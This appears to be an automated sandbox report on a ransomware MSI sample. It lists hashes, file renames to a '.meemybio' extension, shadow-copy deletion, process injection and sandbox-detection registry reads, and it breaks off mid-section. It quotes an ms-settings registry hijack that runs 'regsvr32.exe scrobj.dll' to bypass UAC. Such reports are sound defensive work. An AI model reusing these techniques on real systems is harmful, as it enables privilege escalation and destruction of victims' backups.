Analysis
-
max time kernel
292s -
max time network
300s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
23-05-2022 05:24
Static task
static1
Behavioral task
behavioral1
Sample
MAG.msi
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
MAG.msi
Resource
win10v2004-20220414-en
General
-
Target
MAG.msi
-
Size
96KB
-
MD5
957d0c81c985609c580565a0323a14cd
-
SHA1
d8d46413409a14a1ae407107016e28074c6824d5
-
SHA256
9180fe1ea22b07841146ba483d454faf092c8cd9fed14222a08b7392cda2e7be
-
SHA512
0ff024ff07ab13e7d308429fd8906560e58610b63a7dd468f6b5b6c86221962dbc27e93090e5607104201e9cabe90b52affba54411a541f5c2f5369db231cf52
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
MsiExec.exedescription ioc process File renamed C:\Users\Admin\Pictures\RemoveExport.tif => C:\Users\Admin\Pictures\RemoveExport.tif.meemybio MsiExec.exe File renamed C:\Users\Admin\Pictures\SubmitUnregister.crw => C:\Users\Admin\Pictures\SubmitUnregister.crw.meemybio MsiExec.exe File renamed C:\Users\Admin\Pictures\CompressSend.png => C:\Users\Admin\Pictures\CompressSend.png.meemybio MsiExec.exe File renamed C:\Users\Admin\Pictures\ExportInitialize.png => C:\Users\Admin\Pictures\ExportInitialize.png.meemybio MsiExec.exe File renamed C:\Users\Admin\Pictures\MountTest.png => C:\Users\Admin\Pictures\MountTest.png.meemybio MsiExec.exe File renamed C:\Users\Admin\Pictures\PushConvertFrom.tif => C:\Users\Admin\Pictures\PushConvertFrom.tif.meemybio MsiExec.exe File renamed C:\Users\Admin\Pictures\ImportTrace.tif => C:\Users\Admin\Pictures\ImportTrace.tif.meemybio MsiExec.exe File opened for modification C:\Users\Admin\Pictures\StepOpen.tiff MsiExec.exe File renamed C:\Users\Admin\Pictures\StepOpen.tiff => C:\Users\Admin\Pictures\StepOpen.tiff.meemybio MsiExec.exe -
Loads dropped DLL 1 IoCs
Processes:
MsiExec.exepid process 748 MsiExec.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
MsiExec.exedescription pid process target process PID 748 set thread context of 2384 748 MsiExec.exe sihost.exe PID 748 set thread context of 2396 748 MsiExec.exe svchost.exe PID 748 set thread context of 2492 748 MsiExec.exe taskhostw.exe -
Drops file in Program Files directory 2 IoCs
Processes:
setup.exedescription ioc process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\b8d2acf9-a11f-4204-b537-d3e08c661f52.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220523072615.pma setup.exe -
Drops file in Windows directory 9 IoCs
Processes:
msiexec.exedescription ioc process File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\e57ba76.msi msiexec.exe File opened for modification C:\Windows\Installer\e57ba76.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIBC6A.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{ACB5AE58-BF5F-4C81-8759-EF28BCB9E5CA} msiexec.exe File opened for modification C:\Windows\Installer\MSIC322.tmp msiexec.exe File created C:\Windows\Installer\e57ba78.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exevssvc.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 800 vssadmin.exe 2308 vssadmin.exe 2464 vssadmin.exe 3900 vssadmin.exe 3736 vssadmin.exe 2820 vssadmin.exe -
Modifies data under HKEY_USERS 1 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe -
Modifies registry class 18 IoCs
Processes:
regsvr32.exeregsvr32.exeregsvr32.exesihost.exemsedge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings regsvr32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" sihost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe Set value (int) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/glvt6878zb" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings\shell\open\command regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\ms-settings regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
msiexec.exeMsiExec.exemsedge.exemsedge.exeidentity_helper.exemsedge.exepid process 2344 msiexec.exe 2344 msiexec.exe 748 MsiExec.exe 748 MsiExec.exe 4400 msedge.exe 4400 msedge.exe 4984 msedge.exe 4984 msedge.exe 4304 identity_helper.exe 4304 identity_helper.exe 264 msedge.exe 264 msedge.exe 264 msedge.exe 264 msedge.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
Processes:
MsiExec.exepid process 748 MsiExec.exe 748 MsiExec.exe 748 MsiExec.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
Processes:
msedge.exepid process 4984 msedge.exe 4984 msedge.exe 4984 msedge.exe 4984 msedge.exe 4984 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exevssvc.exedescription pid process Token: SeShutdownPrivilege 5104 msiexec.exe Token: SeIncreaseQuotaPrivilege 5104 msiexec.exe Token: SeSecurityPrivilege 2344 msiexec.exe Token: SeCreateTokenPrivilege 5104 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 5104 msiexec.exe Token: SeLockMemoryPrivilege 5104 msiexec.exe Token: SeIncreaseQuotaPrivilege 5104 msiexec.exe Token: SeMachineAccountPrivilege 5104 msiexec.exe Token: SeTcbPrivilege 5104 msiexec.exe Token: SeSecurityPrivilege 5104 msiexec.exe Token: SeTakeOwnershipPrivilege 5104 msiexec.exe Token: SeLoadDriverPrivilege 5104 msiexec.exe Token: SeSystemProfilePrivilege 5104 msiexec.exe Token: SeSystemtimePrivilege 5104 msiexec.exe Token: SeProfSingleProcessPrivilege 5104 msiexec.exe Token: SeIncBasePriorityPrivilege 5104 msiexec.exe Token: SeCreatePagefilePrivilege 5104 msiexec.exe Token: SeCreatePermanentPrivilege 5104 msiexec.exe Token: SeBackupPrivilege 5104 msiexec.exe Token: SeRestorePrivilege 5104 msiexec.exe Token: SeShutdownPrivilege 5104 msiexec.exe Token: SeDebugPrivilege 5104 msiexec.exe Token: SeAuditPrivilege 5104 msiexec.exe Token: SeSystemEnvironmentPrivilege 5104 msiexec.exe Token: SeChangeNotifyPrivilege 5104 msiexec.exe Token: SeRemoteShutdownPrivilege 5104 msiexec.exe Token: SeUndockPrivilege 5104 msiexec.exe Token: SeSyncAgentPrivilege 5104 msiexec.exe Token: SeEnableDelegationPrivilege 5104 msiexec.exe Token: SeManageVolumePrivilege 5104 msiexec.exe Token: SeImpersonatePrivilege 5104 msiexec.exe Token: SeCreateGlobalPrivilege 5104 msiexec.exe Token: SeBackupPrivilege 5088 vssvc.exe Token: SeRestorePrivilege 5088 vssvc.exe Token: SeAuditPrivilege 5088 vssvc.exe Token: SeBackupPrivilege 2344 msiexec.exe Token: SeRestorePrivilege 2344 msiexec.exe Token: SeRestorePrivilege 2344 msiexec.exe Token: SeTakeOwnershipPrivilege 2344 msiexec.exe Token: SeRestorePrivilege 2344 msiexec.exe Token: SeTakeOwnershipPrivilege 2344 msiexec.exe Token: SeRestorePrivilege 2344 msiexec.exe Token: SeTakeOwnershipPrivilege 2344 msiexec.exe Token: SeRestorePrivilege 2344 msiexec.exe Token: SeTakeOwnershipPrivilege 2344 msiexec.exe Token: SeRestorePrivilege 2344 msiexec.exe Token: SeTakeOwnershipPrivilege 2344 msiexec.exe Token: SeRestorePrivilege 2344 msiexec.exe Token: SeTakeOwnershipPrivilege 2344 msiexec.exe Token: SeRestorePrivilege 2344 msiexec.exe Token: SeTakeOwnershipPrivilege 2344 msiexec.exe Token: SeRestorePrivilege 2344 msiexec.exe Token: SeTakeOwnershipPrivilege 2344 msiexec.exe Token: SeRestorePrivilege 2344 msiexec.exe Token: SeTakeOwnershipPrivilege 2344 msiexec.exe Token: SeRestorePrivilege 2344 msiexec.exe Token: SeTakeOwnershipPrivilege 2344 msiexec.exe Token: SeRestorePrivilege 2344 msiexec.exe Token: SeTakeOwnershipPrivilege 2344 msiexec.exe Token: SeRestorePrivilege 2344 msiexec.exe Token: SeTakeOwnershipPrivilege 2344 msiexec.exe Token: SeRestorePrivilege 2344 msiexec.exe Token: SeTakeOwnershipPrivilege 2344 msiexec.exe Token: SeRestorePrivilege 2344 msiexec.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
msiexec.exemsedge.exepid process 5104 msiexec.exe 5104 msiexec.exe 4984 msedge.exe 4984 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
